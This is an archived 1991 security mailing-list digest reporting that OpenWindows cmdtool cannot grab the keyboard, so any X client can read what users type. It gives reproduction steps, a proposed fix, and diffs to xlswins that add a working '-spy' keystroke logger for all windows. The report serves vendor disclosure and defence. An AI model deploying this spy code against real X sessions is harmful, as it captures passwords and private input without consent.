The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: Core 'Security Digest' - Archives (1990 - 1991)
DOCUMENT: Core 'Security Digest' V1 #18 1991-05-31 (1 file, 2752 bytes)
SOURCE: http://securitydigest.org/exec/display?f=core/archive/118.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT


Date: Fri May 31 12:54:15 PDT 1991
Subject: Core Security Digest V1 #18

Core Security Digest Volume 1 Issue 18

subject(s):

            OpenWindows security problem

The unix core security mailing list is by invitation only and contains
sensitive material which SHOULD NOT BE REVEALED to non-members.
DO NOT PUT ANY LIST CONTENTS IN LOCATIONS ACCESSABLE TO NON-MEMBERS.
If you must keep copies on-line, please encrypt them at the very least.

PLEASE POST TO:                              core@uninet.cpd.com
PLEASE SEND EMERGENCY ALERTS TO:   core-emergency@uninet.cpd.com
PLEASE SEND REQUESTS TO:             core-request@uninet.cpd.com


------------------------------------------------------------------------

Date: Fri, 24 May 91 17:14:54 -0400
From: steve@umiacs.UMD.EDU (Steve D. Miller)
Subject: OpenWindows security problem

Here's a copy of something I just sent off to security-alert@sun.com.  If
I had OpenWindows sources, I'd go fix this, but I don't, so...   My apologies
if this is old hat to everyone, or if it's mentioned in the release notes
somewhere.

Description:
	Because it seems to be impossible to tell cmdtool/shelltool to
	do a keyboard grab, typing passwords or sensitive information in
	an OpenWindows cmdtool or shelltool is inherently insecure.

Repeat-By:
	[ Note: we use cmdtool to refer to both cmdtool and shelltool,
	since they're the same program. ]

	Write a program that registers an interest in keyboard events for a
	cmdtool window, and that turns those events back into strings.  Then
	run that program against a cmdtool and go type in the cmdtool.
	Watch the spy program you wrote print out what you're typing.

	Next go run an xterm from MIT X11R4, run the spy program against
	that window; the spy will still show you what you're typing.  Now
	select Secure Keyboard from the Main Options menu (ctrl-left, by
	default) and type in the xterm some more; note that the spy isn't
	at this point showing what you're typing.

	I do have a primitive spy program that does this.  I'm certainly
	not an X11 guru -- this is my second or third X11 program, and
	none of them have been more than about 100 lines long -- but this
	still didn't take me more than an hour and a half to write.  The
	diffs (based on the vanilla X11R4 sources to xlswins) are at the
	end of this message.

Fix:
	Add the same basic type of code to cmdtool that was added to xterm.
	You'll need to add a new menu entry somewhere so people can get at
	the Secure Keyboard function.

	It's possible that closing this hole won't really help anything, as
	it occurs to me that maybe one can use the NeWS part of xnews to get
	the same information.  I don't know enough about either X11, NeWS,
	or xnews to be able to say anything useful there, so I won't.

	Yes, I know that using a real authentication protocol (or an
	approximation, such as MIT-MAGIC-COOKIE-1) makes it a lot harder to
	do this sort of thing.  Still, it's not impossible, and besides, it
	took a long time just to get the users to understand xhost, so they
	probably won't understand xauth for a while yet.  (-:

Spoken: Steve Miller    Domain: steve@umiacs.umd.edu    UUCP: uunet!mimsy!steve
Phone: +1-301-405-6736  USPS: UMIACS, Univ. of Maryland, College Park, MD 20742

[ start diffs to xlswins ]
*** old xlswins.c	Fri May 24 16:54:53 1991
--- xlswins.c	Fri May 24 16:54:53 1991
***************
*** 32,37 ****
--- 32,41 ----
  static char *output_format = "0x%lx";
  static char widget_name_buf[1024], widget_class_buf[1024];

+ #define MAX_STRING	100
+ char buffer[MAX_STRING];
+ Bool do_spy;
+
  static void usage ()
  {
      static char *help[] = {
***************
*** 40,45 ****
--- 44,50 ----
  "    -indent number                   amount to indent per level",
  "    -long                            print a long listing",
  "    -resources                       print a listing of widget resources",
+ "    -spy                             spy on keyboard input to all windows",
  "",
  NULL};
      char **cpp;
***************
*** 123,128 ****
--- 128,138 ----
  {
      char *displayname = NULL;
      Display *dpy;
+     XEvent nextevent;
+     XKeyEvent *foo = (XKeyEvent *)&nextevent;
+     KeySym keysym;
+     XComposeStatus comp;
+     int bufsiz = MAX_STRING;
      Bool long_version = False;
      Bool print_resources = False;
      int i;
***************
*** 129,134 ****
--- 139,145 ----
      int indent = 2;

      ProgramName = argv[0];
+     do_spy = False;

      for (i = 1; i < argc; i++) {
  	char *arg = argv[i];
***************
*** 149,154 ****
--- 160,168 ----
  	      case 'r':			/* -resources */
  		print_resources = True;
  		continue;
+ 	      case 's':			/* -spy */
+ 		do_spy = True;
+ 		continue;
  	      case 'f':			/* -format [odh] */
  		if (++i >= argc) usage ();
  		switch (argv[i][0]) {
***************
*** 199,204 ****
--- 213,245 ----
  	}
      }

+     if (do_spy == True) {
+ 	while (1) {
+ 	    int i, count;
+
+ 	    XNextEvent(dpy, &nextevent);
+ 	    if (nextevent.type == KeyPress) {
+ 		count = XLookupString(&nextevent, buffer, bufsiz,
+ 		    &keysym, &comp);
+ 		buffer[count] = '\0';
+ 		printf("in window %x got: ", foo->window);
+ 		for (i = 0 ; i < count ; i++) {
+ 		    if (buffer[i] & 0x80) {
+ 			putchar('~');
+ 			buffer[i] &= 0x7f;
+ 		    }
+ 		    if (buffer[i] < ' ') {
+ 			putchar('^');
+ 			buffer[i] |= 0x40;
+ 		    }
+ 		    putchar(buffer[i]);
+ 		}
+ 	    putchar('\n');
+ 	    fflush(stdout);
+ 	    }
+ 	}
+     }
+
      XCloseDisplay (dpy);
      exit (0);
  }
***************
*** 279,284 ****
--- 320,327 ----

      if (got_xerror) goto done;

+     if (do_spy == True)
+ 	XSelectInput(dpy, w, KeyPressMask);
      if (!XQueryTree (dpy, w, &root, &parent, &children, &nchildren))
        goto done;

------------------------------------------------------------------------

        End of Core Security Digest Volume 1 Issue 18
        **********************

END OF DOCUMENT